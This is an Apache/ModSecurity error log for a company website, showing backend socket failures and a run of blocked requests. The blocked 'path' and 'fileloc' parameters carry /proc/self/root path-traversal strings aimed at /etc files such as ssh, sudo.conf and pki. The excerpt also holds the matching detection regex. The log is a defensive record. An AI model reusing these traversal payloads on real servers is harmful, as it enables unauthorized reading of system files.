[Fri Mar 20 03:33:30.218072 2026] [proxy_fcgi:error] [pid 31215:tid 140411741927168] [client 57.141.18.44:50660] AH01067: Failed to read FastCGI header
[Fri Mar 20 03:33:30.218098 2026] [proxy_fcgi:error] [pid 31215:tid 140411741927168] (104)Connection reset by peer: [client 57.141.18.44:50660] AH01075: Error dispatching request to : 
[Fri Mar 20 03:33:30.218363 2026] [proxy:error] [pid 30077:tid 140411557287680] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:30.218380 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] [client 57.141.18.106:50440] AH01079: failed to make connection to backend: httpd-UDS
[Fri Mar 20 03:33:30.218392 2026] [proxy_fcgi:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:41174] AH01067: Failed to read FastCGI header, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/www
[Fri Mar 20 03:33:30.218407 2026] [proxy_fcgi:error] [pid 11167:tid 140411725141760] (104)Connection reset by peer: [client 74.7.241.31:41174] AH01075: Error dispatching request to : , referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/www
[Fri Mar 20 03:33:30.323939 2026] [proxy:error] [pid 30077:tid 140411674785536] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:30.323967 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] [client 57.141.18.73:50670] AH01079: failed to make connection to backend: httpd-UDS
[Fri Mar 20 03:33:30.719549 2026] [proxy:error] [pid 17887:tid 140411632822016] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:30.719580 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] [client 57.141.18.84:50678] AH01079: failed to make connection to backend: httpd-UDS
[Fri Mar 20 03:33:30.794063 2026] [proxy:error] [pid 17887:tid 140411649607424] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:30.794101 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:37568] AH01079: failed to make connection to backend: httpd-UDS, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root
[Fri Mar 20 03:33:30.903446 2026] [proxy:error] [pid 7893:tid 140411582465792] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:30.903495 2026] [proxy_fcgi:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:59928] AH01079: failed to make connection to backend: httpd-UDS, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/www
[Fri Mar 20 03:33:31.143282 2026] [proxy:error] [pid 7893:tid 140411624429312] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:31.143318 2026] [proxy_fcgi:error] [pid 7893:tid 140411624429312] [client 57.141.18.124:50682] AH01079: failed to make connection to backend: httpd-UDS
[Fri Mar 20 03:33:31.404138 2026] [proxy:error] [pid 26799:tid 140411741927168] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Fri Mar 20 03:33:31.404180 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] [client 57.141.18.0:50684] AH01079: failed to make connection to backend: httpd-UDS
[Fri Mar 20 03:33:40.861320 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:37578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqRBCii7xarUs8iHYx6gAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:45.214355 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:45148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqSfXLqtnMIWvjpaJm7QAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:49.131317 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:45158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqTbninkcc-iUj5AorrAAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:33:56.535013 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:49956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqVF1pVZ5mVmJwsFP_TAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:00.299367 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:57736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqWF1pVZ5mVmJwsFP_TQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:10.005515 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:57738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqYvHIg5MgXLBnicPKDQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:15.623852 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:59286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqZ9a6ubjKNq_cu4acOAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:39.185668 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:59288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqf9a6ubjKNq_cu4acTwAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:41.608735 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:48468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqgQF0L0L-SsrnPo41_AAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:34:44.972501 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:48484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqhDJ3M9BSuKP7CAbdvgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:47.339056 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:59938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqh-oXxyEfFpUF8f9R9wAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:49.403540 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:48498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqida6ubjKNq_cu4acWQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:34:50.836628 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:59062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqivXLqtnMIWvjpaJnAgAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:52.191662 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.241.31:59064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqjF1pVZ5mVmJwsFP_XQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:54.535705 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:59070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqjvqxLDW4GITHUkSwFgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:34:57.678661 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:59078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqkfqxLDW4GITHUkSwGgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:01.268692 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:42162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqlfXLqtnMIWvjpaJnBgAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:03.234769 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:42164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzql9a6ubjKNq_cu4acWwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:04.200708 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:56346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] 